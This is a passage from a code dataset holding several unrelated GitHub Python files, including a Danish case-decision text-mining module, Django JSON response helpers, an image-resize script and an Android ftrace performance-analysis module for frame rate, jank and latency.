frame=height*10)\n # print(\"Frame: \" + str(counter))\n counter += 1\n \n mat = bpy.data.materials.new(name='Material')\n mat.use_nodes = True\n principled_node = mat.node_tree.nodes.get('Principled BSDF')\n principled_node.inputs[0].default_value = (random.random(), random.random(), random.random(), 0.5)\n obj.data.materials.append(mat)\n\nbpy.ops.mesh.primitive_plane_add(enter_editmode=False, align='WORLD', location=(0, 0, 0), scale=(1, 1, 1))\n","repo_name":"yannstlo/Box-Animation","sub_path":"Boxes.py","file_name":"Boxes.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21246487500","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport re\nimport os\nfrom os.path import join\nimport json\nimport unicodedata\n\ndef is_pua(c): #https://stackoverflow.com/questions/56337705/removing-all-invalid-characters-e-g-uf0b7-from-text\n \"\"\"\n Detecting invalid unicode characters. Returns bool.\n \"\"\"\n \n return unicodedata.category(c) in ['Co', 'Cc', 'Cf', 'Cs', 'Co', 'Cn']\n\ndef text_splitter(file):\n \"\"\"\n Split document to individual cases. Returns list of strings (one string per case).\n \"\"\"\n\n #pattern = re.compile(r'\\s{0,5}\\n(?=\\s{0,4}Ankestyrelsen\\s{0,4}\\n)', re.DOTALL)\n #pattern = re.compile(r'\\s{0,5}\\n\\s{0,5}A ?n ?k ?e ?s ?t ?y ?r ?e ?l ?s ?e ?n ?\\s{0,5}\\n\\s{0,5}(?!.{0,2}7998)', re.DOTALL)\n pattern = re.compile(r'{PB}(?=.{0,1000}A\\s?f\\s?g\\s?ø\\s?r\\s?e\\s?l\\s?s\\s?e\\s?r?\\s{0,5}\\n\\s{0,5}D\\s?u\\s? \\s?h\\s?a\\s?r\\s? \\s?k\\s?l\\s?a\\s?g\\s?e\\s?t\\s? \\s?o\\s?v\\s?e\\s?r\\s?)', re.DOTALL)\n pattern_replace = re.compile(r'(?<=\\n)G\\'(?=\\s)')\n num_sq_replace = re.compile(r'\\[\\s?\\d\\s?\\]')\n \n doc_text = file.get('text_pypdf')\n text_strip = doc_text.replace('\\n', '{LINJESKIFT}')\n text_strip = ''.join(c for c in text_strip if not is_pua(c))\n text_strip = text_strip.replace('{LINJESKIFT}', '\\n')\n text_strip = text_strip.replace('{PB}', '\\n')\n text_strip = re.sub(pattern_replace, '', text_strip)\n text_strip = re.sub(num_sq_replace, ' ', text_strip)\n text_strip = text_strip.replace(' ', ' ')\n text_strip = text_strip.replace(' -', '-')\n text_strip = text_strip.replace('- ', '-')\n \n \n texts_split = pattern.split(text_strip)\n texts_split.pop(0) # første fundet tekst altid overflødig\n \n texts_return = []\n n = 1\n for text in texts_split:\n if len(text) < 200:\n continue\n \n text_returndict = {'filename': file.get('filename'),\n 'text': text,\n 'n': n,\n 'doc_text': file.get('text_pdfminer')}\n \n texts_return.append(text_returndict)\n \n n = n + 1\n \n return(texts_return)\n\ndef clean_text(text):\n\n # regexes\n pattern_replace = re.compile(r'(?<=\\n)G\\'(?=\\s)')\n num_sq_replace = re.compile(r'\\[\\s?\\d\\s?\\]')\n\n text_strip = text.replace('\\n', '{LINJESKIFT}')\n text_strip = ''.join(c for c in text_strip if not is_pua(c))\n text_strip = text_strip.replace('{LINJESKIFT}', '\\n')\n text_strip = re.sub(pattern_replace, '', text_strip)\n text_strip = re.sub(num_sq_replace, ' ', text_strip)\n text_strip = text_strip.replace(' ', ' ')\n text_strip = text_strip.replace('—', '-')\n text_strip = text_strip.replace(' -', '-')\n text_strip = text_strip.replace('- ', '-')\n text_strip = text_strip.replace('-\\n', '')\n \n return(text_strip)\n\n\ndef get_info_meta(text):\n \"\"\"\n Extract info from meta information in case document (right margin on first page)\n \"\"\"\n\n # regexes\n jnr_re = re.compile(r'j\\.nr\\.?\\s+([0-9]+\\s?[-—]\\s?[0-9]+)', re.IGNORECASE)\n date_re = re.compile(r'(?<=\\n)\\d{1,2}\\..{0,3}\\w{3,10}\\s?\\d{4}')\n\n text = clean_text(text)\n\n info_dict = {}\n\n try:\n jnr = jnr_re.search(text).group(1)\n except:\n jnr = 'not found'\n\n try:\n date = date_re.search(text).group(0)\n except:\n date = 'not found'\n\n info_dict['jnr'] = jnr\n info_dict['date'] = date\n \n return(info_dict)\n\n\ndef get_info_cpr(text):\n \"\"\"\n Extract CPR info from case document.\n \"\"\"\n\n # regexes\n cpr_re = re.compile(r'\\nCpr\\.\\s?nr\\.\\s+(\\d+)\\s+(\\d+)', re.IGNORECASE)\n\n text = clean_text(text)\n\n info_dict = {}\n\n try:\n birthyear = cpr_re.search(text).group(1)\n if int(birthyear) > 21:\n birthyear = '19' + birthyear\n else:\n birthyear = '20' + birthyear\n \n except:\n birthyear = 'not found'\n \n try:\n gender = cpr_re.search(text).group(2)\n \n if int(gender) % 2 == 0:\n gender = 'female'\n else:\n gender = 'male' \n except:\n gender = 'not found'\n\n info_dict['birthyear'] = birthyear\n info_dict['gender'] = gender\n\n return(info_dict)\n\n\ndef get_info_main(text):\n \"\"\"\n Extract info from main text in case document, including grounds.\n \"\"\"\n \n # regexes\n kommune_re = re.compile(r'Du har klaget over ([a-zæøå]+(?:\\-[a-zæøå]+)?)\\s\\s?[K]\\w+', re.IGNORECASE) # kommunenavn\n caseworker_re = re.compile(r'venlig hilsen\\s{1,5}([a-zæøå]+\\s[a-zæøå]+(\\s[a-zæøå]+)?)', re.IGNORECASE) # sagsbehandler\n crit_re = re.compile(r'(?<=\\n)vi kritiserer', re.IGNORECASE) # kritiserer kommunen\n subsid_am_re = re.compile(r'revalidering.{2,25}subsidiær.{5,40}arbejdsmarkedsordninger', re.IGNORECASE | re.DOTALL) # subsidiær ift. arbejdsmarked\n subsid_udd_re = re.compile(r'revalidering.{2,25}subsidiær.{5,40}uddannelsesordninger', re.IGNORECASE | re.DOTALL) # subsidiær ift. uddannelse\n usikkert_re = re.compile(r'usikkert.{4,8}revalidering.{4,8}nødvendigt', re.IGNORECASE | re.DOTALL) # usikkert om revalidering er nødvendigt - \"usikkert\" bruges ikke i andre sammenhæng\n\n ## begrundelser\n ### - Vi lægger vægt …\n ### - Vi lægger også vægt på … \n ### - Vi lægger desuden vægt på …\n\n #important_regex = re.compile(r'(?<=\\n)((?:[\\w\\s]{0,25})?(?:vi )?lægger (?:vi )?(?:[\\w\\s]{3,30})? ?vægt på.*?)(?=\\s{1,3}\\n\\s{1,3}\\n)', re.IGNORECASE|re.DOTALL) \n important_regex = re.compile(r'(?<=\\n)((?:[\\w\\s]{0,25})?(?:vi )?lægger (?:vi )?(?:[\\w\\s]{3,30})? ?vægt på.*?)(?=\\n\\n)', re.IGNORECASE|re.DOTALL) \n\n ## åbenlyst\n ## - \"vurderes åbenlyst, at du ikke opfylder betingelserne\"\n obv_re = re.compile(r'.{50}åbenlys.{150}', re.IGNORECASE | re.DOTALL)\n\n # Clean text\n text = clean_text(text)\n\n # Dictionary for info\n info_dict = {}\n\n\n try:\n kommune = kommune_re.search(text).group(1)\n except:\n kommune = 'not found'\n \n try:\n caseworker = caseworker_re.search(text).group(1)\n except:\n caseworker = 'not found'\n \n grounds = important_regex.findall(text)\n grounds_len = len(''.join(grounds))\n \n info_dict['kommune'] = kommune\n info_dict['caseworker'] = caseworker\n info_dict['kritik_kommune'] = bool(crit_re.search(text))\n info_dict['subsid_am'] = bool(subsid_am_re.search(text))\n info_dict['subsid_udd'] = bool(subsid_udd_re.search(text))\n info_dict['usikkert'] = bool(usikkert_re.search(text))\n info_dict['grounds'] = grounds\n info_dict['grounds_nchar'] = grounds_len\n info_dict['vurdering_åbenlys'] = bool(obv_re.search(text))\n \n return(info_dict)","repo_name":"CALDISS-AAU/bp_mineAnkestyrelsen","sub_path":"modules/mineank_funs.py","file_name":"mineank_funs.py","file_ext":"py","file_size_in_byte":6655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352591817","text":"# -*- coding: utf-8 -*-\n\nclass Solution:\n def permutate(self, result, chars, begin):\n if len(chars) -1 == begin:\n result.append(''.join(chars))\n else:\n for i in range(begin, len(chars)):\n if (i != begin and chars[i] == chars[begin]):\n continue\n chars[i], chars[begin] = chars[begin], chars[i]\n self.permutate(result, chars, begin+1)\n # 防止重复,还得将begin初的元素重新换回来\n chars[i], chars[begin] = chars[begin], chars[i]\n \n def Permutation(self, ss):\n # write code here\n chars = list(ss)\n result = []\n self.permutate(result, chars, 0)\n # 排序\n result = sorted(result, key=lambda x: [xx for xx in x])\n return result\n\nif __name__ == '__main__':\n s = Solution()\n r = s.Permutation('abc')\n print(r)\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"interview/CyC2018_Interview-Notebook/剑指offer/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"70342124008","text":"\nimport os\nimport cv2\n''' 设置图片路径,该路径下包含了14张jpg格式的照片,名字依次为0.jpg, 1.jpg, 2.jpg,...,14.jpg'''\nDATADIR = \"./resized2014\"\nNEWDIR=\"E:\\\\Code\\python\\\\multi-label\\\\Multiple-instance-learning-master\\\\CNN_RNN\\\\data\\\\resized\"\n'''设置目标像素大小,此处设为300'''\nIMG_SIZE=256\n'''使用os.path模块的join方法生成路径'''\npath=os.path.join(DATADIR) \n'''使用os.listdir(path)函数,返回path路径下所有文件的名字,以及文件夹的名字,\n例如,执行下行代码后,img_list是一个list,值为['0.jpg','1.jpg','10.jpg','11.jpg','12.jpg','13.jpg','14.jpg',\n'2.jpg','3.jpg','4.jg', '5.jpg', '6.jpg', '7.jpg', \n'8.jpg', '9.jpg'],注意这个顺序并没有按照从小到大的顺序排列'''\nimg_list=os.listdir(path)\n\nind=0\nfor img in img_list:\n '''调用cv2.imread读入图片,读入格式为IMREAD_COLOR'''\n img_array=cv2.imread(os.path.join(path,img),cv2.IMREAD_COLOR)\n '''调用cv2.resize函数resize图片'''\n # print(os.path.join(path,img))\n new_array=cv2.resize(img_array,(IMG_SIZE,IMG_SIZE))\n img_name=str(ind)+'.jpg'\n '''生成图片存储的目标路径'''\n save_path=os.path.join(NEWDIR, img)\n ind=ind+1\n '''调用cv.2的imwrite函数保存图片'''\n cv2.imwrite(save_path,new_array)\n","repo_name":"silenbee/Multi-label-Learning","sub_path":"CNN-RNN/data/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38866326394","text":"import json\n\nfrom django.shortcuts import render\nfrom growl.external.minify_json import json_minify\nfrom growl.models import model_encode\nfrom growl.models import model_encode_verbose\n\ndef error_dict(http_status_code=400):\n error_dict = _response_dict()\n error_dict['error_code'] = 1\n error_dict['error_msg'] = 'Unknown error'\n error_dict['http_status_code'] = http_status_code\n return error_dict\n\ndef success_dict(http_status_code=200):\n success_dict = _response_dict()\n success_dict['error_code'] = 0\n success_dict['error_msg'] = ''\n success_dict['http_status_code'] = http_status_code\n return success_dict\n\ndef render_json(request, json_values, verbose=False, minify=True):\n http_status = json_values['http_status_code']\n encode = model_encode\n if verbose:\n encode = model_encode_verbose\n json_dumps = json.dumps(json_values, default=encode)\n\n # minify json for smallest payload\n if minify:\n json_dumps = json_minify(json_dumps)\n\n context = {}\n context['json'] = json_dumps\n\n return render(request, 'growl/json.html', context, status=http_status)\n\ndef render_json_500(request, json_values=None, verbose=False, minify=True):\n json_values = json_values or self.error_dict(http_status_code=500)\n json_values['error_code'] = 500\n json_values['http_status_code'] = 500 \n\n encode = model_encode\n if verbose:\n encode = model_encode_verbose\n json_dumps = json.dumps(json_values, default=encode)\n\n # minify json for smallest payload\n if minify:\n json_dumps = json_minify(json_dumps)\n\n context = {}\n context['json'] = json_dumps\n return render(request, 'growl/json.html', context, status=500)\n\n# service is down, shields up\ndef render_json_503(request, json_values=None, verbose=False, minify=True):\n json_values = json_values or self.error_dict(http_status_code=503)\n json_values['error_code'] = 503\n json_values['http_status_code'] = 503 \n json_values['error_msg'] = 'Service not available'\n\n encode = model_encode\n if verbose:\n encode = model_encode_verbose\n json_dumps = json.dumps(json_values, default=encode)\n\n # minify json for smallest payload\n if minify:\n json_dumps = json_minify(json_dumps)\n\n context = {}\n context['json'] = json_dumps\n return render(request, 'growl/json.html', context, status=503)\n\n###\n### PRIVATE\n###\n\ndef _response_dict():\n response_dict = {}\n response_dict['error_code'] = 0\n response_dict['error_msg'] = ''\n response_dict['http_status_code'] = 200\n return response_dict","repo_name":"aschulak/growl-engine","sub_path":"growlengine/growl/views/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36126913786","text":"try:\n from logbook import Logger\nexcept ImportError:\n import logging\n logging.basicConfig()\n from logging import getLogger as Logger\n\nfrom collections import defaultdict, namedtuple\nfrom ftrace.interval import Interval, IntervalList\nfrom ftrace.event import EventList\nfrom ftrace.ftrace import register_api, FTraceComponent\nfrom ftrace.composites import sorted_items\nfrom ftrace.utils.decorators import requires, coroutine, memoize\nfrom ftrace.atrace import AtraceTag\nfrom ftrace.common import filter_by_task\nfrom six import string_types\n\nlog = Logger('Android')\n\nVSYNC = float(1/60.) # 16.67ms\nUI_THREAD_DRAW_NAMES = ['performTraversals', 'Choreographer#doFrame']\nRENDER_THREAD_DRAW_NAMES = ['DrawFrame']\n\nContext = namedtuple('Context', ['pid', 'name', 'interval', 'event'])\nCounter = namedtuple('Counter', ['pid', 'name', 'value', 'interval', 'event'])\n# For app launch latency\nLaunchLatency = namedtuple('LaunchLatency', ['task', 'interval', 'latency'])\n# For touch & input latency\nInputLatency = namedtuple('InputLatency', ['interval', 'latency'])\n# For Rendering intervals\nRendering = namedtuple('Rendering', ['interval'])\n\n\n@register_api('android')\nclass Android(FTraceComponent):\n \"\"\"\n Class with APIs to process android trace events\n written to the trace buffer. These are events not\n part of ftrace API but useful for monitoring performance of\n various frameworks in android OS. Some events (as of Lollipop) are:\n\n gfx - Graphics\n input - Input\n view - View System\n webview - WebView\n wm - Window Manager\n am - Activity Manager\n sync - Sync Manager\n audio - Audio\n video - Video\n camera - Camera\n hal - Hardware Modules\n app - Application\n res - Resource Loading\n dalvik - Dalvik VM\n rs - RenderScript\n bionic - Bionic C Library\n power - Power Management\n\n See `adb shell atrace --list_categories`.\n\n \"\"\"\n def __init__(self, trace):\n self._trace = trace\n self._events = trace.events\n\n self.__event_handlers = {}\n self._tmw_intervals_by_name = defaultdict(IntervalList)\n\n def _initialize(self):\n self._parse_tmw_events()\n\n @property\n @requires('tracing_mark_write')\n def event_names(self):\n return set(self._tmw_intervals_by_name.keys())\n\n @requires('tracing_mark_write')\n @memoize\n def event_intervals(self, name=None, task=None,\n interval=None, match_exact=True):\n \"\"\"Returns event intervals for specified `name` and `task`\n Name here implies `section` or `counter` name.\n \"\"\"\n if name is None:\n intervals = \\\n IntervalList(sorted_items(self._tmw_intervals_by_name.values()))\n elif isinstance(name, string_types):\n if match_exact:\n intervals = self._tmw_intervals_by_name[name]\n else:\n intervals = IntervalList(sorted_items(value for key, value in\n self._tmw_intervals_by_name.iteritems() if name in key))\n else: # assume iterable (must match exact)\n intervals = IntervalList(sorted_items(value for key, value in\n self._tmw_intervals_by_name.iteritems() if key in name))\n intervals = intervals.slice(interval=interval)\n if task:\n intervals = IntervalList(filter(lambda it: it.event.task == task, intervals))\n\n return intervals\n\n #--------------------------------------------------------------------------\n \"\"\"\n Utility script to estimate Frame Rate (FPS) and Jank.\n\n Jank = Interval when surfaceFlinger failed to present.\n \"\"\"\n \n def rendering_intervals(self, interval=None):\n \"\"\"\n \"\"\"\n frames = self.frame_intervals(interval=interval)\n rendering_intervals = IntervalList()\n slice_start = frames[0].interval.start\n for i, j in zip(frames[:-1], frames[1:]):\n if j.interval.start-i.interval.end > 2*VSYNC:\n # new group of frames.\n ri = Rendering(interval=Interval(slice_start, i.interval.end))\n rendering_intervals.append(ri)\n slice_start = j.interval.start\n return rendering_intervals\n \n @requires('tracing_mark_write')\n @memoize\n def render_frame_intervals(self, task=None, interval=None):\n \"\"\"\n Returns intervals a frame from render thread was processed.\n \"\"\"\n return self.event_intervals(name=RENDER_THREAD_DRAW_NAMES, task=task,\n interval=interval, match_exact=False)\n\n @requires('tracing_mark_write')\n @memoize\n def ui_frame_intervals(self, task=None, interval=None):\n \"\"\"\n Returns intervals a frame from UI thread was processed.\n \"\"\"\n return self.event_intervals(name=UI_THREAD_DRAW_NAMES, task=task,\n interval=interval, match_exact=False)\n \n @requires('tracing_mark_write')\n @memoize\n def frame_intervals(self, task=None, interval=None):\n \"\"\"\n Returns intervals a frame from both UI & Render threads were processed.\n \"\"\"\n names = ['animator:'] + UI_THREAD_DRAW_NAMES + RENDER_THREAD_DRAW_NAMES\n return self.event_intervals(name=names, task=task,\n interval=interval, match_exact=False)\n\n @requires('tracing_mark_write')\n @memoize\n def present_duration(self, interval=None):\n \"\"\"\n \"\"\"\n present_duration = 0.0\n vsync_events = self.event_intervals(name='VSYNC-sf', interval=interval)\n if not vsync_events:\n vsync_events = self.event_intervals(name='VSYNC', interval=interval)\n for vsync_event in vsync_events:\n duration = vsync_event.interval.duration\n if duration < 2*VSYNC:\n present_duration += duration\n return present_duration\n\n\n @requires('tracing_mark_write')\n @memoize\n def framerate(self, interval=None):\n \"\"\"\n Since SurfaceFlinger(SF) in Android updates the frame-buffer only\n when there's work to be done. Measuring FPS in traditional sense as\n frames / seconds would be incorrect as time might include intervals\n when no screen updates occurred.\n\n To account for this, we use SF Vsync which is set to 0 when SurfaceFlinger\n has work to do. We accumulate intervals when a framebuffer was posted\n and use this as Frame-rate.\n\n See https://source.android.com/devices/graphics/implement.html\n \"\"\"\n total_frames = 0.0\n\n # These are times when SF begins compositing.\n vsync_events = self.event_intervals(name='VSYNC-sf', interval=interval)\n if not vsync_events:\n vsync_events = self.event_intervals(name='VSYNC', interval=interval)\n\n for vsync_event_a, vsync_event_b in zip(vsync_events, vsync_events[1:]) : \n frames_presented = len(self.event_intervals('postFramebuffer', \n interval=vsync_event_a.interval))\n # Below required to skip interval when we had nothing to do.\n # As this event 'toggles' every VSYNC when SurfaceFlinger has work\n # to do. If nothing is done (i.e. no 'postFramebuffer' events)\n # there was jank in this interval.\n if vsync_event_a.value != vsync_event_b.value and frames_presented:\n total_frames += frames_presented\n \n present_time = self.present_duration(interval=interval)\n return round(total_frames/present_time, 1) if present_time != 0.0 else float('nan')\n\n @requires('tracing_mark_write')\n @memoize\n def jank_intervals(self, interval=None):\n \"\"\"\n Returns list of intervals when a jank (missed frame) occurred.\n \"\"\"\n missedFrames = self.event_intervals('FrameMissed', interval=interval)\n return IntervalList(filter(lambda x:x.value==1, missedFrames))\n\n @requires('tracing_mark_write')\n @memoize\n def num_janks(self, interval=None):\n \"\"\"\n Returns number of janks (missed frame) within interval.\n \"\"\"\n return len(self.jank_intervals(interval=interval))\n \n @requires('tracing_mark_write')\n @memoize\n def jankrate(self, interval=None):\n \"\"\"\n Returns number of janks (missed frame) per second within interval.\n \"\"\"\n try:\n return round(self.num_janks(interval=interval) / self.present_duration(interval=interval), 1)\n except ZeroDivisionError:\n return 0.0\n\n #--------------------------------------------------------------------------\n \"\"\"\n Utility script to estimate input response latency.\n\n Inputs (Touch/Key presses) triggers USB HID report or I2C bus interrupt thats\n sent to Linux Kernel and mapped by Input driver to specific event type and\n code as standardized by Linux Input Protocol,defined by OEM-mapping\n in `linux/input.h`\n\n Next `EventHub` in Android OS layer reads the translated signals by opening\n `evdev` devices for each input device. Then Android's `InputReader`\n component then decodes the input events according to the device class and\n produces a stream of Android input events.\n\n Finally, Android's `InputReader` sends input events to the `InputDispatcher`\n which forwards them to the appropriate window.\n\n We define input latency as time from handling IRQ from touch driver (e.g.\n irq/13-fts_touc) to time when you a screen update from SurfaceFlinger\n after `DeliverInputEvent`. Technically speaking, this is referred to as\n 'input-to-display' latency.\n\n IMPORTANT: We do not account for delays from touch till when\n IRQ is triggered by touch device. This is typically low (<5ms)\n depending on HW.\n\n Further Reading:\n ---------------\n\n https://source.android.com/devices/input/overview.html\n https://www.kernel.org/doc/Documentation/input/event-codes.txt\n\n \"\"\"\n @requires('tracing_mark_write', 'sched_switch', 'sched_wakeup')\n @memoize\n def input_latencies(self, irq_name, interval=None):\n \"\"\"\n Returns input-to-display latencies seen in trace.\n\n IMPORTANT: Trace must be collected with 'input' and 'view' events.\n \"\"\"\n try:\n return self._input_latencies.slice(interval=interval)\n except AttributeError:\n return self._input_latency_handler(irq_name=irq_name).\\\n slice(interval=interval)\n \n @requires('tracing_mark_write')\n @memoize\n def input_events(self, task=None, interval=None):\n all_inputs = self.event_intervals(name='aq:pending:', \n task=task, \n interval=interval, \n match_exact=False)\n \n return IntervalList(filter(lambda input_event: input_event.value==1, \n all_inputs))\n \n def _input_latency_handler(self, irq_name):\n \"\"\"\n Returns list of all input events\n \"\"\"\n self._input_latencies = IntervalList()\n all_tasks = self._trace.cpu.task_intervals()\n all_aq_events = self.input_events()\n touch_irqs = IntervalList(filter_by_task(\n all_tasks, 'name', irq_name, 'any'))\n\n def _input_intervals():\n \"\"\"\n Generator that yields intervals when discrete input event(s)\n are read & decoded by Android `Input Reader`.\n\n x__x__x____IR___ID_ID_ID___DI_SU__DI_SU__DI_SU______\n\n x = multiple input IRQs (multi-touch translated by Android Input Framework)\n IR = Input Reader [read/decodes multiple events @ once]\n ID = Input Dispatch [dispatches each input event]\n DI = Deliver Input [ appropriate window consumes input event ]\n SU = SurfaceFlinger Screen Update due to window handling input event\n\n Please note InputReader 'iq' will be set to 1 whenever InputReader\n had event to process. This could be disabled in some systems.\n \"\"\"\n last_timestamp = self._trace.interval.start\n for ir_event in filter_by_task(all_tasks, 'name', 'InputReader', 'any'):\n yield Interval(last_timestamp, ir_event.interval.end)\n last_timestamp = ir_event.interval.end\n\n for interval in _input_intervals():\n irqs = touch_irqs.slice(interval=interval, trimmed=False)\n # Necessary as we may be interested in different IRQ name\n if irqs:\n # Use longest IRQ\n start_ts = max(irqs, key=lambda x: x.interval.duration).interval.start\n\n\n end_ts = start_ts\n post_ir_interval = Interval(start_ts, self._trace.duration)\n di_events = self.event_intervals(name=['deliverInputEvent', 'input'], interval=post_ir_interval)\n\n if di_events:\n # IMPORTANT: If InputDispatcher sythesizes multiple\n # events to same application, we ignore consequent event\n # and only parse 1st event. This is because we heuristically\n # can't determine start of next input event to differentiate.\n di_event = di_events[0]\n # necessary in case a synthetic events is cancelled\n # canceled appropriately when the events are no longer\n # being resynthesized (because the application or IME is\n # already handling them or dropping them entirely)\n # This is done by checking for dumping input latencies when\n # active input event queue length (aq) is > 1 for same task.\n\n # For more details, see\n # https://android.googlesource.com/platform/frameworks/base.git/+\n # /f9e989d5f09e72f5c9a59d713521f37d3fdd93dd%5E!/\n\n # This returns first interval when aq has pending event(s)\n di_event_name = getattr(di_event, 'name', None)\n if di_event_name and di_event_name == 'input':\n pfb_events = self.event_intervals(name='doComposition', interval=post_ir_interval)\n else: \n aq_event = filter_by_task(all_aq_events.slice(\n interval=post_ir_interval),\n 'pid', di_event.event.task.pid)\n \n if aq_event and aq_event.value > 0:\n post_di_start = aq_event.interval.start\n else:\n if aq_event:\n continue # if AQ event exists.\n post_di_start = di_events[0].interval.start\n \n post_di_interval = Interval(post_di_start,\n self._trace.duration)\n \n pfb_events = self.event_intervals(name='doComposition', interval=post_di_interval)\n \n if pfb_events:\n end_ts = pfb_events[0].interval.end\n if start_ts != end_ts and end_ts > start_ts and start_ts not in self._input_latencies._start_timestamps:\n input_interval = Interval(start=start_ts, end=end_ts)\n self._input_latencies.append(InputLatency(interval=input_interval,\n latency=input_interval.duration))\n\n return self._input_latencies\n\n #---------------------------------------------------------------------------\n \"\"\"\n Utility script to estimate application launch latency without instrumenting\n each app. This has been well validated and found effective for over 80 top\n apps on Android Lollipop device. Validation was done by visually comparing\n below markers to screen capture of the launched app.\n\n IMPORTANT: For complex app with `welcome screen` displayed prior to\n user-interactable window e.g. games, this excludes such intervals and\n only captures up to first displayed window.\n Typically GLSurfaces are used post-welcome screen.\n \"\"\"\n\n @memoize\n def _launched_app_events(self, interval=None):\n \"\"\"\n Upon launch, applications goes through 3 states:\n - process creation (fork from zygote)\n - bind application\n - launch (as defined in App Lifecycle on Android OS\n i.e. onCreate/onStart etc.)\n\n We guestimate which app is launched by on\n bindApplication logged by Android.\n \"\"\"\n bindApplications = self.event_intervals(name='bindApplication')\n return bindApplications.slice(interval=interval)\n\n @memoize\n def launched_app_events(self, interval=None):\n \"\"\"\n First `bindApplication` indicates first (actual) app-launch.\n Note that any single app-launch can initiate launch of other\n processes (hence forks of zygotes and consequent `bindApplication`)\n \"\"\"\n return self._launched_app_events(interval=interval)\n\n @memoize\n def _start_launch_time(self, launched_event):\n \"\"\"\n Start time estimated as first time we ever saw (i.e. scheduled on CPU)\n the launched task.\n \"\"\"\n if launched_event:\n interval = Interval(0, launched_event.timestamp)\n return self._trace.cpu.task_intervals(task=launched_event.task,\n interval=interval)[0].interval.start\n\n @requires('tracing_mark_write')\n @memoize\n def _end_launch_time(self, launched_event, next_launched_event=None):\n \"\"\"\n End time estimated as last `performTraversals`(screen update) that caused\n a `setTransactionState`.\n\n setTransactionState() is invoked to inform SurfaceFlinger state of changes\n of the surface; changes can be layer_state_t and Display_state\n (see native/include/private/gui/LayerState.h).\n\n layer_state_t indicates changes in position/color/depth/size/alpha/crop etc\n Display_state indicates changes in orientation, etc\n \"\"\"\n end_time = None\n max_end_time = self._start_launch_time(next_launched_event) \\\n if next_launched_event else self._trace.duration\n # after launch\n pl_interval = Interval(launched_event.timestamp, max_end_time)\n performTraversals = self.event_intervals(name=UI_THREAD_DRAW_NAMES,\n task=launched_event.task,\n interval=pl_interval,\n match_exact=False)\n last_end = max_end_time\n for pt_event in reversed(performTraversals):\n sts_interval = Interval(pt_event.interval.start, last_end)\n sts_events = self.event_intervals(name='setTransactionState',\n interval=sts_interval)\n # ignore 'setTransactionState' due to app close/focus switch\n # by checking 'wmUpdateFocus'\n wmuf_events = self.event_intervals(name='wmUpdateFocus',\n interval=sts_interval)\n if sts_events and not wmuf_events and sts_interval.end != max_end_time:\n end_time = sts_interval.end\n break\n last_end = pt_event.interval.start\n\n return end_time\n\n\n @requires('tracing_mark_write', 'sched_switch', 'sched_wakeup')\n @memoize\n def app_launch_latencies(self, task=None):\n \"\"\"Return launch latency seen in trace\"\"\"\n launch_latencies = []\n launched_events = list(self.launched_app_events())\n launched_events.append(None)\n\n for curr_app_event, next_app_event in zip(launched_events, launched_events[1:]):\n event = curr_app_event.event\n next_event = next_app_event.event if next_app_event else None\n if task and event.task != task:\n continue\n start_time, end_time = \\\n self._start_launch_time(event), self._end_launch_time(event, next_event)\n if (start_time and end_time) is not None:\n launch_interval = Interval(start_time, end_time)\n launch_latencies.append(LaunchLatency(task=event.task,\n interval=launch_interval,\n latency=launch_interval.duration))\n return launch_latencies\n #---------------------------------------------------------------------------\n\n @coroutine\n def _context_handler(self):\n \"\"\"\n \"\"\"\n last_timestamp = self._trace.interval.start\n last_event = None\n counter_events_by_pid = defaultdict(EventList)\n\n try:\n while True:\n event = (yield)\n pid = event.task.pid\n tag = event.data.atrace_tag\n if tag is AtraceTag.CONTEXT_BEGIN:\n counter_events_by_pid[pid].append(event)\n elif tag is AtraceTag.CONTEXT_END and counter_events_by_pid[pid]:\n last_event = counter_events_by_pid[pid].pop()\n last_timestamp = last_event.timestamp\n last_pid, last_name = \\\n last_event.data.pid, last_event.data.section_name\n interval = Interval(last_timestamp, event.timestamp)\n context = Context(pid=last_pid, name=last_name,\n interval=interval, event=last_event)\n self._tmw_intervals_by_name[last_name].append(context)\n else:\n log.warn(\"Missing start marker {event}\".format(event=event))\n\n except GeneratorExit:\n # close things off\n for pid, event_list in counter_events_by_pid.iteritems():\n for event in event_list:\n last_timestamp = event.timestamp\n interval = Interval(last_timestamp, self._trace.duration)\n if event.data.atrace_tag is not AtraceTag.CONTEXT_END:\n pid, name = event.data.pid, event.data.section_name\n context = Context(pid=pid, name=name, interval=interval, event=event)\n self._tmw_intervals_by_name[name].append(context)\n\n\n @coroutine\n def _async_event_handler(self):\n \"\"\"\n TODO: Track by cookie. This is rarely used!!!\n \"\"\"\n last_timestamp = self._trace.interval.start\n last_event = None\n # Stack them like Jason (JSON) 'PID', then 'cookie'\n counter_events_by_cookie = defaultdict(EventList)\n counter_events_by_pid = defaultdict(lambda : counter_events_by_cookie)\n\n try:\n while True:\n event = (yield)\n pid, cookie = event.data.pid, event.data.cookie\n tag = event.data.atrace_tag\n event_list = counter_events_by_pid[pid][cookie]\n if tag is AtraceTag.ASYNC_BEGIN:\n event_list.append(event)\n elif tag is AtraceTag.ASYNC_END and event_list:\n last_event = event_list.pop()\n last_timestamp = last_event.timestamp\n interval = Interval(last_timestamp, event.timestamp)\n context = Context(pid=pid, name=last_event.data.section_name,\n interval=interval, event=last_event)\n self._tmw_intervals_by_name[context.name].append(context)\n else:\n log.warn(\"Missing start marker {event}\".format(event=event))\n\n except GeneratorExit:\n # close things off\n for pid, by_name in counter_events_by_pid.iteritems():\n for cookie, event_list in by_name.iteritems():\n for event in event_list:\n last_timestamp = event.timestamp\n interval = Interval(last_timestamp, self._trace.duration)\n context = Context(pid=pid, name=event.data.section_name,\n interval=interval, event=event)\n self._tmw_intervals_by_name[context.name].append(context)\n\n @coroutine\n def _counter_handler(self):\n \"\"\"\n \"\"\"\n last_timestamp = self._trace.interval.start\n last_value = -1.0\n last_event = None\n # Stack them like Jason (JSON) 'PID', then 